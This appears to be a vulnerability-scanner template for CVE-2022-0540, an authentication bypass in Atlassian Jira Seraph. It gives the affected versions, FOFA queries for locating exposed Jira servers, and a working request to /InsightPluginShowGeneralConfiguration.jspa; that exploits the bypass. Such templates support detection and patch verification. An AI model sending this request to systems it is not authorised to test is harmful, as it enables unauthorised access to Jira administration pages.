A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to
bypass authentication by sending a specially crafted HTTP
request. This affects Atlassian Jira Server and Data Center versions before 8.13.18,
versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0.
This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18,
versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
fofa "Atlassian Jira"
fofa title="General"
PoC代码[已公开]
id: CVE-2022-0540
info:
name: Atlassian Jira - Authentication bypass in Seraph
author: DhiyaneshDK 不动明王
severity: critical
verified: true
description: |-
A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to
bypass authentication by sending a specially crafted HTTP
request. This affects Atlassian Jira Server and Data Center versions before 8.13.18,
versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0.
This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18,
versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
fofa "Atlassian Jira"
fofa title="General"
reference:
- https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0540
- https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
tags: cve,cve2022,jira,unauthorized,bypass
created: 2023/06/23
rules:
r0:
request:
method: GET
path: /InsightPluginShowGeneralConfiguration.jspa;
expression: response.status == 200 && response.body.bcontains(b'General Insight Configuration')
expression: r0()